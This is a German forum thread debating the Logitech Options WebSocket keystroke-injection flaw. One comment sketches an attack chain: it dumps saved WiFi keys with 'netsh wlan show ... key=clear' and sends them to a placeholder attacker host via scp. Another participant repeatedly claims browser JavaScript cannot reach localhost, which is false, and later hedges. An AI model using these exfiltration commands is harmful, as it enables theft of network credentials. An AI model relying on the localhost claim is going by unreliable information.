News Update der Options-Software: Logitech-Tastaturen ließen sich von Hackern steuern

[T_55]

Dann starte mal in einer Konsole mit Adminrechten
"netstat -ab"
und staune.

Einen Web-Socket als listener zu öffnen ist nicht ungwöhnlich. Nur sollte es konfigurierbar und abschaltbar sein - bzw. in diesem Fall auch per Default aus sein, da es der Anwender nicht erwarten kann.

Das kommt immer auf das OS an wo man staunt Das es "nicht ungewöhnlich" zu sein scheint, zeigt doch genau wie weit es schon gekommen ist.
Mir der Erhöhung der Anzahl laufender Dienste kann es statistisch sicherheitstechnisch nicht besser werden aber diese Denkweise gibt es bei vielen nicht und man lässt sich sonst was als Schlangenöl verkaufen.
Software wird leider meist nicht mehr klein und effizient programmiert mit dem Fokus auf die eigentliche Funktion, heute geht es zu oft nur noch um Datenausleitung, nicht selten das Software geschrieben wird mit dem Ziel der Datenausleitung was dann den Leuten als Pseudotool angedreht wird.

 

[Grestorn]

Na, dann mach das selbe unter Linux und staune eben da.

Einen Socket als Listener aufzumachen ist absolut common practice. Und in diesem Fall ist es ja sogar eine dokumentierte Schnittstelle, die einfach nur extrem schlecht gemacht ist: https://github.com/Logitech/logi_craft_sdk

Aber Hauptsache mal wieder gegen das OS gehatet. Ihr seid so durchschaubar.

 

[kokiman]

Na, dann mach das selbe unter Linux und staune eben da.

Einen Socket als Listener aufzumachen ist absolut common practice. Und in diesem Fall ist es ja sogar eine dokumentierte Schnittstelle, die einfach nur extrem schlecht gemacht ist: https://github.com/Logitech/logi_craft_sdk

Aber Hauptsache mal wieder gegen das OS gehatet. Ihr seid so durchschaubar.

Naja gut zumindest hat man unter Linux oder Unix Systemen die Möglichkeit mit Bordmitteln diese Sockets zu blocken. Unter Windows geht das nicht weil die Firewall sich nicht um die Loopback-Adresse schert.

 

[Grestorn]

Über die Loopback Adresse kann man auch nur vom eigenen Rechner drauf zugreifen. Das wäre nun wirklich keine Sicherheitslücke ... nun ja, keine große jedenfalls (klar, man kann darüber Tasten simulieren, das wäre schon ausnützbar... aber wenn ich schon auf dem Rechner selbst bin, habe ich das selten nötig).

 

[T_55]

Aber Hauptsache mal wieder gegen das OS gehatet. Ihr seid so durchschaubar.

Nö meine Anmerkungen betreffen genau die, denen alles egal ist ganz unabhängig vom OS. Was ich anspreche trifft insbesondere auch auf zb Apps im Handy zu. Auch bei Linux oder sonstwo kann man Kiloweise unnötige Dienste laufen lassen und so seine Angriffsfläche vergrößern. Das tut man dann aber manuell im Bewusstsein von "Fremdpakete können das System gefährden". Dieses Bewusstsein gibt es tatsächlich bei Win weniger. Aber im Prinzip ist es wurst, denn jeder der sich eine Software draufpackt, egal auf welches OS, welche sich als Blackbox groß im Hintergrund breit macht, dem ist dieses Thema eh egal.

 

[kokiman]

Über die Loopback Adresse kann man auch nur vom eigenen Rechner drauf zugreifen. Das wäre nun wirklich keine Sicherheitslücke ... nun ja, keine große jedenfalls (klar, man kann darüber Tasten simulieren, das wäre schon ausnützbar... aber wenn ich schon auf dem Rechner selbst bin, habe ich das selten nötig).

Naja macht man ja auch, der Browser führt das JS oder whatever aus und das zeigt auf localhost. Da nun kein origin check o.Ä. in dem Websocket implementiert ist, blockt er dann auch sowas nicht.

 

[Grestorn]

Naja macht man ja auch, der Browser führt das JS oder whatever aus und das zeigt auf localhost. Da nun kein origin check o.Ä. in dem Websocket implementiert ist, blockt er dann auch sowas nicht.

Die Sandbox in der js läuft lässt keinen Zugriff auf den loopback Adapter (127.0.0.1) zu. DAS wäre sonst mal eine RIESEN Sicherheitslücke. Und zwar aus ungefähr 100.000 Gründen.

 

[arktom]

Besser als ein Russendienst




Es ist bei der Regierung rausgeflogen wegen der Sicherheit. Ob das nur politisch motiviert ist kannst du doch gar nicht sagen. Kann sein das Putin alles loggt!

Das ist ja ebenfalls sehr fundiert. Es kann also sein, dass Putin alles loggt? Und dass die USA (deren Regierung(en)) das nicht machen, obgleich Ähnliches bereits nachweislich passierte ... naja, lassen wir das. Aber die USA haben Kaspersky ja verbannt. Ergo muss es böse sein können.

Kann es sein, dass du bei Avira arbeitest, und andere Produkte schlecht machen willst? Oder kann es sein, dass du einfach gerne drauf los schreibst, was sein könnte?

 

[Zespire]

Und wie genau kommt man da ran pingt man einfach solange zufällige ips über den Port bis es eine positive Antwort gibt?

 

[rob-]

Wahrscheinlich gar nicht, da der Router letztendlich entscheidet und default alles blockt was von außen kommt, solange nicht manuell erlaubt.

 

[UNDERESTIMATED]

Im Fall Deines Hausarztes müsste man sich schon im lokalen Netzes des Artzes befinden, um die Lücke nutzen zu können. Und wenn man das geschafft hat, ist die Lücke in der Tastatur-Software das geringste Problem.

Nunja, zunächst einmal muss der Schaden ja nicht erst entstehen, es reicht ja ein Verbot wie bspw. Saufen und Autofahren und Strafen bei Nichtbeachtung - bspw. ein 3-monatiges Vertriebsverbot der mit Schadhafter SW belasteten Produkte und ein "Verfall" des Kaufvertrages für die belasteten Kunden/Einzelhändler. Das würde wenigstens mal richtig weh tun, allerdings wirds wieder am "kleinen" ausgelassen werden wie ich unser Land kenne - sprich den unnötigen Arbeitsplätzen bspw...

So wie ich dej Artikel verstanden habe reicht aber doch schon eine Verbindung zu dem Nach-Außen offenen Port der SW, wieso sollte man dazu denn im Heimnetz sein müssen? Versteh' ich da was verkehrt?

Wenns denn "unbeobachtete" Eingaben annimmt könnte man ja "Win+R, cmd, Enter, netsh wlan show profiles" >hacker.txt
Danach netsh wlan show name="WIFINAME" key=clear >hacker.txt
cp %\hacker.txt
scp %/hacker.txt derfiesetyp@deinempc.de:~/sonordner/mitdeinenWIFIdaten.txt

Dankesehr.

Alternativ von außen: Strg+A, Enter und woanders +v, bspw. auf "pastebin.org" via %DEFAULTBROWSER% +F2 "pastebin.org" TabTabTab StrgA TabTabEnter F2 StrgA

Ins cmd fenster zurück und auf seinem SSH Server die adresse als befehl pasten, sieht man ja dann im serverlog.

Es geht sicher einiges, so "Sicher" vor Angriffen würde ich mir da nicht sein wollen.

Sind natürlich falsche und flüchtige Beispiele, aber gehen tut vieles mit dem Kommandozeilenapparat. Auch sichtbar wird das ganze mit ein wenig Kenntnis sehr schnell.

Alles in allem vorbereitet mach ich das von daheim bspw. in unter 30Sekunden. Habe SSID/WPAKey und vollen Zugriff auf einen SSH Server+Clienten. das kann böse enden. RDP Incoming...

 

[Grestorn]

So wie ich dej Artikel verstanden habe reicht aber doch schon eine Verbindung zu dem Nach-Außen offenen Port der SW, wieso sollte man dazu denn im Heimnetz sein müssen? Versteh' ich da was verkehrt

Es wird nur auf dem lokalen Rechner ein Port geöffnet und auf ihm "gelauscht" (listened), etwas, was jede Socket-Basierte API macht. Davon hast Du zu jedem Zeitpunkt immer eine Reihe von laufen auf Deinem Rechner.

Die sind aber immer nur im lokalen Heim-Netzwerk nutzbar. Um einen Port auch nach außen (also vom Internet aus) nutzbar zu machen, muss man entweder ein "Port-Forward" auf seinem Internet-Router einrichten, oder der Rechner muss selbst per "Universal Plug and Play" ein solches Forward im Router aktivieren (und der Router muss das auch erlauben).

Das größte Risiko ist, wie ich schon schrieb, dass man sich ggf. in einem "feindlichen" Netz befinden könnte, was passieren kann, wenn man mit dem Notebook unterwegs ist und sich in ein fremdes, ungeschütztes WLan eingewählt hat. Das ist immer ein Risiko, aus diversen Gründen. Da ist dann diese Lücke von Logitech nur ein weiteres Angriffstor von vielen anderen.

Leider werden diese technischen Fakten in den Artikeln nicht erklärt oder auch nur erwähnt, sondern es wird halt immer erst mal Panik gemacht. Die wenigsten Menschen machen sich die Mühe, hinter die Technik zu blicken und das tatsächlich vorhandene Risiko einzuschätzen. Der Fehler liegt hier klar bei den Journalisten, die lieber ein paar Clicks mehr haben, als aufzuklären. Skandale verkaufen sich nun mal besser als nüchterne Informationen.

 

[Udo Kammer]

Auf meinen beiden PCs wurde Logitech Options am 14.12. gegen 18.00 Uhr per automatischen Update aktualisiert. Ohne diese Software würden diverse Möglichkeiten der Logitech Craft und Logitech MX Master nicht zur Verfügung stehen.

 

[IstVan82]

Lohnt es sich nicht gänzlich eine Firewall zu nutzen, und die Regeln manuell zu bedienen?
Ist am Anfang eine Menge Arbeit, aber auf jeden Fall sicherer.

 

[Jesterfox]

Leider werden diese technischen Fakten in den Artikeln nicht erklärt oder auch nur erwähnt, sondern es wird halt immer erst mal Panik gemacht.

"Die bisherigen Versionen der Software öffneten einen WebSocket-Server, der auf dem Port 10134 läuft und beliebige Befehle und Eingaben auch über aufgerufene Websites zuließ, so dass Angreifer beliebige Aktionen über den Zugriff auf der Tastatur vornehmen konnten."

Wer hat denn nun Recht? Denn so wie ich es (nicht nur aus diesem) Artikel rauslesen war der Web-Socket eben auch per JavaScript aus dem Browser aus zugreifbar so das eben doch auch "von Außen" ein Angriff durchgeführt werden konnte indem man Webseiten entsprechend manipuliert und dort bösartige Scripte unterbringt.

 

[Grestorn]

Das ist halt einfach technischer Quatsch. Anders kann man es nicht sagen.

Der Originalartikel war auch schon schlecht formuliert, und die Übersetzung hat ihren Beitrag, es vollständig unklar zu machen.

Die API und wie sie funktioniert, ist verlinkt. Den Link habe ich weiter oben auch selbst nochmal abgegeben. Es ist eine offizielle, auf GitHub gehostete Schnittstelle, nichts geheimes oder technisch unklares.

Ein Zugriff von JavaScript auf den localhost ist nicht möglich, das erlaubt die Sandbox nicht. Sonst gäbe es 1000 Angriffsmöglichkeiten.

 

[Jesterfox]

Ein Zugriff von JavaScript auf den localhost ist nicht möglich, das erlaubt die Sandbox nicht. Sonst gäbe es 1000 Angriffsmöglichkeiten.

Sicher? Ich kann in den ganzen Web-Socket Dokumentationne die ich bisher gesichtet hab nichts dazu finden, dafür aber sowas:

Cross Origin Communication
Being a modern protocol, cross origin communication is baked right into WebSocket. While you should still make sure only to communicate with clients and servers that you trust, WebSocket enables communication between parties on any domain. The server decides whether to make its service available to all clients or only those that reside on a set of well defined Domains.

(https://www.html5rocks.com/en/tutorials/websockets/basics/)

Mir kommt es auch seltsam bis bedenklich vor... aber ich find da nichts anderweitiges. Nur immer die Aussage dass der Server das ganze validieren und absichern sollte (was bei der Logitech-Software nicht der Fall war)

 

[Grestorn]

Was hier als "WebSocket" bezeichnet wird, ist einfach nur ein offener IP TCP Port, auf dem mit einem http Protokoll gelauscht wird.

Ob ein Port von außen (also vom Internet aus) erreichbar ist oder nicht, liegt nur an der Konfiguration des Rechners (Firewall) und Deiner Netzinfrakstruktur. Wenn Logitech nicht auch gleich eine Firewall-Rule hinterlegt, die den Port aufmacht, blockt direkt gleich die lokale Firewall. Wenn das ausgehebelt wird, dann blockt Dein Router - dem restlichen lokalen Netz bist Du dann aber ausgeliefert.

Da gibt es wirklich keine offenen Fragen. Du musst mir auch nicht glauben, aber lies Dich mal in die Problematik von TCP Sockets ein und welche Sicherheitsaspekte es dabei gibt.

 

[Jesterfox]

Es geht ja nicht um "von Außen" sondern um "vom Browser aus". Ich hab mich mit Websockets (ja sind, TCP Sockets, aber über die ein spezielles Protokoll gesprochen wird, ohne das keine Verbindung aufgebaut werden kann) noch nicht so weit beschäftigt das ich da eine abschließende Antwort geben kann, aber das was ich wie gesagt bisher drüber gefunden hab legt nahe dass die Browser auch Verbindungen auf fremde URLs (also z.B. auch localhost) zulassen (im Gegensatz zu Java Applets...)

 

[Grestorn]

Gestern hatte ich eine Webseite, auf der klar stand, dass keine JS Verbindungen auf localhost (loopback) zugelassen werden. Jetzt finde ich die aber nicht mehr. Probiert habe ich es nicht.

Es macht jedenfalls aus meiner Sicht keinen Sinn, warum ein JS auf irgendeine localhost-Ressource zugreifen können sollte, das ist m.E. ein klarer Verstoß gegen die Einschränkung, dass von innerhalb der Sandbox auf keine Ressourcen des Hostsystems zugegriffen werden können soll.

Aber wie gesagt, ich finde keine Seite, die das klar so nachweist. Deswegen muss ich meine eigenen Aussagen jetzt selbst etwas mit einem "grain of salt" versehen.